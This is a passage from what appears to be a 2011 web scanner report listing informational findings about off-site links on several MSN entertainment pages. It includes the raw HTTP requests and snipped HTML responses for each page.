<div>Listen to <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/music/overview/search?q=Britney+Spears&go=&form=msnpop">more of her music</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.180. http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Famous-young-fashionistas.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx?cp-documentid=27204726&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=famous+young+fashionistas&form=msnhal
http://www.bing.com/search?q=high+fashion+looks+for+kids+and+budget&form=msnhal
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661317&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FFamous-young-fashionistas.aspx%3Fcp-documentid%3D27204726%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Famous-young-fashionistas.aspx?cp-documentid=27204726&imageindex=1 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=685f34fea8b942adb9a17c93ade9da44; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0BD72654B6C940B7A0451ABD96CD65B1; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:57 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 29800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661317&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FFamous-young-fashionistas.aspx%3Fcp-documentid%3D27204726%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=famous+young+fashionistas&form=msnhal"><strong>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=high+fashion+looks+for+kids+and+budget&form=msnhal">High-fashion looks for kids on a budget</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.181. http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx?cp-documentid=27490004

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=Kool+Herc+&qpvt=Kool+Herc+&FORM=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=2010+best+and+worst+grammy+dresses&go=&form=msnpop
http://www.bing.com/search?q=Grammy+Awards+Feb+13th+2011&go=&form=msnpop
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=Kool+Herc+donation+information&go=&form=msnpop
http://www.bing.com/search?q=Kool+Herc+hospitalized+with+unknown+illness&go=&form=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=flavor+flav+fried+chicken&go=&form=msnpop
http://www.bing.com/search?q=hip-hop+pioneer+hospitalized&go=&form=msnpop
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661299&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FHip-hop-pioneer-hospitalized.aspx%3Fcp-documentid%3D27490004&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx?cp-documentid=27490004 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=04bfc738a566438c80c6c2ff63a7c524; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E5DB20456C7B4394A7ADB6775515E3DE; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:39 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661299&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FHip-hop-pioneer-hospitalized.aspx%3Fcp-documentid%3D27490004&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=hip-hop+pioneer+hospitalized&go=&form=msnpop"><strong>
...[SNIP]...
<div>Kool Herc (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Kool+Herc+&qpvt=Kool+Herc+&FORM=msnpop">see photos</a>), one of hip-hop...s founding fathers, has been hospitalized. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Kool+Herc+hospitalized+with+unknown+illness&go=&form=msnpop">Find out why</a>.) ..He reportedly doesn...t have medical insurance and cannot afford his medical bills. Fans are being urged to donate to a fund set up to help him. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Kool+Herc+donation+information&go=&form=msnpop">Learn more</a>
...[SNIP]...
<div>Former rap and reality TV star, Flavor Flav entered a new business venture. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=flavor+flav+fried+chicken&go=&form=msnpop">What is it?</a>
...[SNIP]...
<div>Rap mogul, Jay-Z received 6 Grammy nominations. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Grammy+Awards+Feb+13th+2011&go=&form=msnpop">Find out when to watch</a>
...[SNIP]...
<div>Find out who was the best and worst dressed at <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=2010+best+and+worst+grammy+dresses&go=&form=msnpop">last year...s Grammys</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.182. http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Javier-Bardem-as-Bond.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx?cp-documentid=27488743

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=Javier+bardem+and+cruz+&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=Rachel+Weisz+and+bond&form=msnpop
http://www.bing.com/search?q=Stephen+King+and+Dark+Tower+series+and+game&form=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=javier+bardem+bond&form=msnpop
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/search?q=Daniel+Craig+and+bond&FORM=msnpop
http://www.bing.com/videos/search?q=Javier+bardem+and+No+Country+for+Old+Men&FORM=msnpop
http://www.bing.com/videos/search?q=javier+bardem+and+Biutiful&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661305&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FJavier-Bardem-as-Bond.aspx%3Fcp-documentid%3D27488743&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Javier-Bardem-as-Bond.aspx?cp-documentid=27488743 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:45 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ef6a231c16624d94babb4199147f1396; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7FB5D009C7D945E0B1A7731F9A245D02; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:45 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661305&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FJavier-Bardem-as-Bond.aspx%3Fcp-documentid%3D27488743&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<strong><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=javier+bardem+bond&form=msnpop"><strong>
...[SNIP]...
<div>The ...Biutiful... actor (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=javier+bardem+and+Biutiful&FORM=msnpop">watch</a> clips) reportedly has his choice of high profile roles. Will he play a villain in Bond 23? (See who...s <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=Daniel+Craig+and+bond&FORM=msnpop">likely to return</a> as Bond.) Or will Bardem take the lead in the ...Dark Tower... series from Stephen King? (Find out <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Stephen+King+and+Dark+Tower+series+and+game&form=msnpop">what other book spinoffs</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Rachel+Weisz+and+bond&form=msnpop">A ...Mummy... actress</a>
...[SNIP]...
<div>Bardem and wife Penelope Cruz recently had their first child. See <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Javier+bardem+and+cruz+&go=&form=msnpop">them together</a>
...[SNIP]...
<div>The Oscar nominee already has one win. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/search?q=Javier+bardem+and+No+Country+for+Old+Men&FORM=msnpop">Watch his speech</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.183. http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx?cp-documentid=27205056&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=celebrity+plastic+surgery+disasters&go=&form=msnhal
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=healthy+tips&go=&form=msnhal
http://www.bing.com/search?q=most+wanted+celebrity+body+parts&src=IE-SearchBox&FORM=msnhal
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661317&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FEntertainment%2FMost-wanted-celebrity-body-parts.aspx%3Fcp-documentid%3D27205056%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx?cp-documentid=27205056&imageindex=1 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=87f6c24088014aaba1a6b01f6b5e80bc; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=ECA32B9925C4459B83B694DACD7E5E6F; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:57 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 32416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
